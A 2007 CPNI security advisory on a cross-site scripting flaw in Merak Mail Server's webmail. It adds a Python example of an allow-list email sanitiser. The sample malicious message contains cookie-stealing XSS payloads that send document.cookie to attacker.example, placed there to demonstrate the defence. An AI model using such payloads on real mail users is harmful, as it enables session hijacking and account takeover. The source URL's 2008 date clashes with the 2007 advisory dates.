CPNI - Centre for the Protection of National Infrastructure

September 2007

3388 - Merak Mail Server Vulnerability

ID: 3388
Date: 18 September 2007 09:41

Title: 3388 - Merak Mail Server Vulnerability
Abstract: Description of a vulnerability in the Merak Mail Server recently reported by MWR InfoSecurity.
Vendors affected: Merak
Availability of fix: Available
Type of fix: Patch
Source: MWR InfoSecurity
Reliability of source: Trusted
Source URL: http://www.mwrinfosecurity.com/publications/mwri_merak-webmail-xss-advisory_2008-09-17.pdf

CVE Reference: Not yet submitted
Date: 2007-08-29
Severity: High Risk
Local/Remote: Remote
Vulnerability Class: XSS
Affected Versions: Confirmed in versions 8.9.2 and 8.9.1
Vendor: http://www.merakemailserver.co.uk
Vendor Response: Version 9 of the Merak Mail Server has since been released.
OWASP Designation: Cross Site Scripting (XSS)
Web Application Language: PHP, HTML, JavaScript
Impact: The vulnerability allows malicious scripts to be executed within the context of the user’s browser window.

Overview: The Merak Mail Server provides a web based interface called IceWarp which allows users to send and retrieve emails using a web browser. However, email content is not sufficiently sanitised which can result in the execution of arbitrary scripts.

On accessing the web interface of the application the user is assigned two session IDs. An attacker could harvest these session IDs by sending specially crafted emails to users: script embedded in the message body executes when the user opens it, and the session IDs are transmitted to the attacker. With this information the attacker would be able to gain access to the users' accounts. In fact, an attacker would have the ability to embed any JavaScript within an email, so a wide variety of XSS attacks could be performed.

This vulnerability has been confirmed in versions 8.9.1 (Windows) and 8.9.2 (Linux).

It is expected, although not confirmed, that other, earlier versions are also vulnerable.

Cause: The vulnerability is the result of insufficient sanitisation of email content.

Interim Workaround: Restricting webmail access to trusted IP addresses only will help to mitigate the effect of some XSS attacks. Note that this limits where a harvested session ID can be used from; it does not stop the injected script from executing in the browser of a user who opens the message.
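The following is an added illustration of the cause and the fix, written for this page; it is not code from the advisory, from MWR InfoSecurity, or from the Merak/IceWarp product. It contrasts the unsafe pattern the advisory describes (the email body dropped into the webmail page as-is) with an allow-list sanitiser that rebuilds the body from only permitted tags and attributes. The page template, tag lists, and the malicious message are constructed for the demonstration and are assumptions, not details of the product.

```python
"""Stored XSS in webmail: unsafe rendering next to an allow-list sanitiser.

Added example, not taken from the advisory or the Merak/IceWarp code base.
The allowed tag/attribute sets, the page template and the sample message
are constructed for the demonstration.
"""
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse

# Markup a webmail renderer can reasonably pass through. Anything else is
# dropped: the tag disappears, its text content is kept (escaped).
ALLOWED_TAGS = {"p", "br", "b", "i", "u", "em", "strong", "a",
                "ul", "ol", "li", "blockquote"}
ALLOWED_ATTRS = {"a": {"href"}}
SAFE_URL_SCHEMES = {"http", "https", "mailto"}
VOID_TAGS = {"br"}

# Constructed webmail page; the body fragment is placed inside the div.
PAGE_TEMPLATE = "<html><body><div id='message'>{body}</div></body></html>"


def _safe_href(value: str) -> bool:
    """Reject javascript:, data:, vbscript: and any other unexpected scheme."""
    return urlparse(value.strip()).scheme.lower() in SAFE_URL_SCHEMES


class EmailBodySanitizer(HTMLParser):
    """Re-emit only allow-listed markup; re-escape all text and attributes.

    <script>/<style> content is discarded entirely, event-handler and style
    attributes are never copied, and href values with unsafe schemes are
    dropped. Nothing the sender wrote reaches the page as raw markup.
    """

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self._skip_depth = 0  # > 0 while inside <script> or <style>

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip_depth += 1
            return
        if self._skip_depth or tag not in ALLOWED_TAGS:
            return
        parts = [f"<{tag}"]
        for name, value in attrs:
            # Drops onload=, onerror=, style=, and anything not allow-listed.
            if name not in ALLOWED_ATTRS.get(tag, set()) or value is None:
                continue
            if name == "href" and not _safe_href(value):
                continue
            parts.append(f' {name}="{escape(value, quote=True)}"')
        parts.append(">")
        self.out.append("".join(parts))

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self._skip_depth = max(0, self._skip_depth - 1)
            return
        if self._skip_depth or tag not in ALLOWED_TAGS or tag in VOID_TAGS:
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._skip_depth:
            # convert_charrefs decoded entities; escape again on the way out.
            self.out.append(escape(data, quote=False))


def sanitize_email_html(body: str) -> str:
    """Return the body reduced to allow-listed, re-escaped markup."""
    parser = EmailBodySanitizer()
    parser.feed(body)
    parser.close()
    return "".join(parser.out)


def render_unsafe(body: str) -> str:
    """The pattern the advisory describes: body inserted into the page as-is."""
    return PAGE_TEMPLATE.format(body=body)


def render_safe(body: str) -> str:
    """Hardened variant: body sanitised before it is placed in the page."""
    return PAGE_TEMPLATE.format(body=sanitize_email_html(body))


# Constructed attacker message: three ways of reaching document.cookie plus
# a benign paragraph that already contains escaped angle brackets.
MALICIOUS_BODY = (
    "<p>Hi, see the attached invoice.</p>"
    "<img src=\"x\" onerror=\"new Image().src="
    "'http://attacker.example/?c='+document.cookie\">"
    "<script>location='http://attacker.example/?c='+document.cookie</script>"
    "<a href=\"javascript:alert(document.cookie)\">click</a>"
    "<p>Regards &lt;b&gt;not bold&lt;/b&gt;</p>"
)

if __name__ == "__main__":
    print("UNSAFE:", render_unsafe(MALICIOUS_BODY))
    print("SAFE:  ", render_safe(MALICIOUS_BODY))
```

The sanitiser parses and re-serialises rather than trying to blacklist patterns in the raw string, which is what makes it robust against encoding tricks: every byte of output is either a tag the allow list produced or text that was escaped on the way out.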

Solution: The vendor has recommended that users upgrade to Merak Email Server 9.

This advisory contains information released by the original author. Some of the information may have changed since it was released. If the issue affects you, it may be prudent to retrieve the advisory from the site of the original source to ensure that you receive the most current information concerning that problem. Reference to any specific commercial product, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favouring by CPNI.

The views and opinions of authors expressed within this notice shall not be used for advertising or product endorsement purposes. CPNI shall not accept responsibility for any errors or omissions contained within this advisory. In particular, they shall not be liable for any loss or damage whatsoever, arising from or in connection with the usage of information contained within this advisory.

CSIRTUK is a member of the Forum of Incident Response and Security Teams (FIRST) and has contacts with other international Incident Response Teams (IRTs) in order to foster cooperation and coordination in incident prevention, to prompt rapid reaction to incidents, and to promote information sharing amongst its members and the community at large.
